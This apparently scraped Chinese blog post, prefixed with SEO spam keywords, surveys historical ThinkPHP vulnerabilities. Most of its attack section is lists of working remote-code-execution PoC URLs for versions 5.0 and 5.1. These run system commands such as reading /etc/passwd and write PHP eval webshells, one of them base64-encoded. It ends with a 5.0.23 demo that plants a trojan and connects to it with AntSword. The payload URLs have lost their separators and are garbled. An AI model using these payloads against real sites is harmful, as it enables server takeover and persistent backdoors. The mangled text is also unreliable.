上海网站建设服,石家庄软件公司排名,凡科快图免费版商用,网站建设易网宣常见历史漏洞之Thinkphp 一、介绍二、Thinkphp历史漏洞三、Thinkphp特征发现四、批量漏洞检测五、漏洞总结六、5.0.23版本案例演示 一、介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开… 常见历史漏洞之Thinkphp 一、介绍二、Thinkphp历史漏洞三、Thinkphp特征发现四、批量漏洞检测五、漏洞总结六、5.0.23版本案例演示 一、介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开发的所以thinkphp出问题的话会影响很多基于thinkphp开发的网站。 二、Thinkphp历史漏洞
ThinkPHP3.2.3_缓存函数设计缺陷可导致GetshellThinkPHP5_SQL注入漏洞敏感信息泄露ThinkPHP3.2.3_最新版update注入漏洞ThinkPHP5.0.10缓存函数设计缺陷可导致GetshellThinkPHP3.2.X_find_select_delete注入ThinkPHP框架5.0.X_sql注入漏洞分析ThinkPHP3.X_order_by注入漏洞ThinkPHP5.X_order_by注入漏洞ThinkPHP5.X_远程代码执行
三、Thinkphp特征发现 默认页面 错误页面 开启了debug模式的错误页面 - 未开启debug模式的错误页面四、批量漏洞检测
https://github.com/Lucifer1993/TPscan
python TPscan.pyhttps://github.com/theLSA/tp5-getshell
python2.7 tp5-getshell.py -u http://192.168.9.148:8080/说明漏洞存在可以进行漏洞利用。使用ThinkphpGUI-1.2-SNAPSHOT进行漏洞扫描和命令执行。 切换版本进行命令执行。 五、漏洞总结
Thinkphp3 漏洞总结https://y4er.com/post/thinkphp3-vuln/ Thinkphp5 RCE总结https://y4er.com/post/thinkphp5-rce/ 5.0.* 常用PoC
#执行命令
/index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami
/index.php?sindex/think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1#写入Webshell
/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]file_put_contentsvars[1][]shell.phpvars[1][]?php eval($_POST[ccc]);?/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg | base64 -d shell9.php
5.1.* 常用PoC
#执行命令
/index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1
/index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami
/index.php?sindex/\think\Request/inputfiltersystemdataid (dir ls)
/index.php?s/index/\think\request/cachekey1|phpinfo#写入Webshell
/index.php?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo ?php eval($_POST[ccc]);? shell.php
(echo ^?php eval($_POST[ccc]);?^ shell1.php)/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1]]whoami
/index.php?sindex/\think\Request/inputfilterphpinfodata1
/index.php?sindex/\think\Request/inputfiltersystemdataid (dir ls)
/index.php?sindex/\think\template\driver\file/writecacheFileshell.phpcontent%3C?php%20phpinfo();?%3E
/index.php?sindex/\think\view\driver\Php/displaycontent%3C?php%20phpinfo();?%3E
/index.php?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]phpinfovars[1][]1六、5.0.23版本案例演示 1、查看。
#查看
/index.php?scaptcha
_method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]cat /etc/passwd_method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]ls2、写入木马文件。
/index.php?scaptcha
_method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]echo ?php eval(\$_POST[cmd]);? 1.php3、写入成功。 4、使用蚁剑进行连接。